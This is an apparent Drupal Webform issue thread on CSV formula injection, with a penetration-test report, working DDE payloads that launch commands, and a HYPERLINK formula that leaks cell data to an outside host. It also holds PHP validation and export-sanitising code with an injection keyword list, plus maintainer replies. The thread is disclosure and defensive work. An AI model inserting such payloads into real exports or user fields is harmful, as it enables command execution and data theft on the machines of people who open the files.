Also known as CSV injection or formula injection.
An attacker can store a malicious payload string in a text field in the application.
If the exported CSV file is opened in a spreadsheet application that interprets values as formulas (such as Microsoft Excel, Google Sheets, or LibreOffice Calc), the payload will run, usually executing attacker-controlled commands or exfiltrating data from the spreadsheet.
Steps to replicate the issue (simple example demonstrating code execution):
- Create a webform
- Insert a text area field
- Publish the webform and navigate to it
- Insert into the text area field:
  =cmd|'/C calc.exe'!Z0
  and submit the form
- Download the resulting CSV file and open it in Microsoft Excel on your local machine
- Result: the Windows default calculator is opened automatically
Other examples:
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")
=DDE("cmd";"/C calc";"__DdeLink_60_870516294")
While a benign payload was used in this instance, other Windows commands may be used as part of a malicious payload. Common real-world attacks against vulnerabilities of this type include submitting an encoded PowerShell script which establishes a command-and-control connection to an attacker-controlled server, granting the attacker ongoing control of the victim's computer.
An unauthenticated attacker on the Internet may be able to leverage this vulnerability to gain a foothold in a domain environment.
At present, the best defence strategy we are aware of is prefixing cells that start with '=', '+' or '-' with an apostrophe. This will ensure that the cell isn't interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed.
Solution suggestion (implemented in my theme):
<?php

use Drupal\Core\Form\FormStateInterface;

/**
 * Implements hook_form_alter().
 *
 * Lives in THEME_NAME.theme; replace "theme_name" with the theme's machine name.
 */
function theme_name_form_alter(array &$form, FormStateInterface $form_state, $form_id) {
  if (isset($form['#theme'][0]) && $form['#theme'][0] === 'webform_submission_form') {
    $form['#validate'][] = 'theme_name_webform_validate';
  }
}

/**
 * Validation handler: neutralise CSV injection payloads in webform values.
 */
function theme_name_webform_validate(array &$form, FormStateInterface $form_state) {
  // Get the submitted values.
  $values = $form_state->getValues();
  // Internal form keys to leave out of the check.
  $exclude_keys = [
    'path',
    'submit',
    'honeypot_time',
    'form_build_id',
    'form_id',
    'op',
  ];
  // Values consisting of exactly one of these tokens are left unchanged.
  $injection_keys = [
    'hyperlink',
    'cmd',
    'dde',
    '!',
    '|',
    '/',
    '\\',
    '‘',
    '\'',
    '“',
    '"',
    '=',
    '+',
    '-',
    '@',
  ];
  // A value starting with one of these characters may be read as a formula.
  $injection_startwith_pattern = '#^[=+\-@]#';
  foreach ($values as $key => $val) {
    // Only inspect non-empty, non-numeric strings on fields that are not excluded.
    if ($val &&
      is_string($val) &&
      !is_numeric($val) &&
      !in_array($key, $exclude_keys, TRUE)) {
      // Normalise the value before inspecting it.
      $val_inspect = trim(strtolower($val));
      // Flag values that start with a potentially harmful formula character.
      if (!in_array($val, $injection_keys, TRUE) &&
        preg_match($injection_startwith_pattern, $val_inspect) === 1) {
        // Prepend an apostrophe so the cell is read as text rather than a formula.
        $val_corrected = '\'' . $val;
        // Save the new value.
        $form_state->setValue($key, $val_corrected);
      }
    }
  }
}
More info resources:
https://www.contextis.com/us/blog/comma-separated-vulnerabilities
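As an added example (not code from this issue or from the Webform module), a standalone PHP sanitiser that applies the apostrophe-prefix defence described above at export time, plus an audit function that flags cells in an already-exported CSV that a spreadsheet would evaluate as formulas. It goes beyond the description's list of '=', '+', '-' and '@' by also treating a leading tab or carriage return as a formula trigger, in line with the OWASP CSV injection guidance. The function names and the sample rows are constructed for this example.

```php
<?php
// Added example, not code from the issue thread or the Webform module.
// Demonstrates the apostrophe-prefix defence at CSV export time and an audit
// pass that flags formula-like cells in a CSV that was exported without it.
// Function names and the sample rows below are constructed for this example.

/**
 * Return the cell value prefixed with an apostrophe when a spreadsheet would
 * otherwise evaluate it as a formula.
 *
 * Triggers: a leading '=', '+', '-' or '@' (as in the issue description) and,
 * going beyond it, a leading tab or carriage return, which Excel also treats as
 * formula starters. Numeric strings such as "-5" or "+3" are left alone so that
 * ordinary negative numbers survive the export unchanged.
 */
function csv_escape_cell($value): string {
  if (!is_string($value) || $value === '' || is_numeric($value)) {
    return (string) $value;
  }
  $triggers = ['=', '+', '-', '@', "\t", "\r"];
  if (in_array($value[0], $triggers, TRUE)) {
    // The leading apostrophe makes the spreadsheet read the cell as text.
    return "'" . $value;
  }
  return $value;
}

/**
 * Serialise rows to CSV. With $escape = TRUE every cell passes through
 * csv_escape_cell(); FALSE reproduces an unprotected export for comparison.
 */
function csv_export(array $rows, bool $escape = TRUE): string {
  $fh = fopen('php://temp', 'r+');
  foreach ($rows as $row) {
    fputcsv($fh, $escape ? array_map('csv_escape_cell', $row) : $row);
  }
  rewind($fh);
  $csv = stream_get_contents($fh);
  fclose($fh);
  return $csv;
}

/**
 * Parse a CSV string and return every cell that csv_escape_cell() would have
 * altered, with its 1-based row and column, so suspicious submissions can be
 * reported or excluded before anyone opens the file in a spreadsheet.
 */
function csv_find_formula_cells(string $csv): array {
  $hits = [];
  $fh = fopen('php://temp', 'r+');
  fwrite($fh, $csv);
  rewind($fh);
  $line = 0;
  while (($row = fgetcsv($fh)) !== FALSE) {
    $line++;
    foreach ($row as $col => $cell) {
      if (is_string($cell) && csv_escape_cell($cell) !== $cell) {
        $hits[] = ['row' => $line, 'col' => $col + 1, 'value' => $cell];
      }
    }
  }
  fclose($fh);
  return $hits;
}

// Constructed sample submissions: the second row carries the payload quoted in
// the issue description, the third a benign-looking value with a '@' prefix.
$rows = [
  ['Name', 'Comment', 'Score'],
  ['Alice', 'Thanks for the quick reply', '10'],
  ['Mallory', "=cmd|'/C calc.exe'!Z0", '-5'],
  ['Eve', '@SUM(A1:A2)', '+3'],
];

// Audit an unprotected export: both formula-like comments are reported, the
// numeric scores are not.
$unsafe = csv_export($rows, FALSE);
foreach (csv_find_formula_cells($unsafe) as $hit) {
  printf("row %d col %d would be evaluated as a formula: %s\n",
    $hit['row'], $hit['col'], $hit['value']);
}

// The protected export: only the two flagged cells gain a leading apostrophe.
echo "\n", csv_export($rows);
```

The export side is the same fix as the validation hook above, applied at the point where the CSV is written rather than when the submission is saved, so values that were stored before the hook existed are covered too. The audit function answers the request later in this thread to mark potentially harmful submissions: running it over an existing export lists the exact cells to review or drop.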
Comments
Comment #2 (gigimaor)
Comment #3 (gigimaor)
Comment #4
jrockowitz commented
@see #2788591: Add warning about opening CSV files with spreadsheets
Comment #5
gigimaor commented
Hi Jacob.
Drupal version is 8.8.8.
I work for a QLD, Australia government agency.
We hired a 3rd party security test agency to run a penetration test on our website.
The COMMA-SEPARATED VALUES INJECTION was marked as a high-severity security issue in that last test.
Governments take those recommendations very seriously, since they are everyday potential targets for hackers.
Many government agencies choose Drupal because of its high security policy. Drupal cannot be a gate to harming local machines and domains that are operated mostly by non-technical users, especially when exporting webform CSV results and opening them in Microsoft Excel for further analysis.
Microsoft is doing a good job securing Excel, but having a security message when opening a CSV that has a million submissions is not a pretty view.
Do you think this issue can be solved in Drupal core? At least mark potentially harmful submissions for exclusion from the exported CSV file?
Comment #6
jrockowitz commented
Organizations can disable the CSV export options via /admin/structure/webform/config/exporters
This discussion needs to be moved over to the security team, who will have more insight on how to best handle this issue.
Comment #7
jrockowitz commented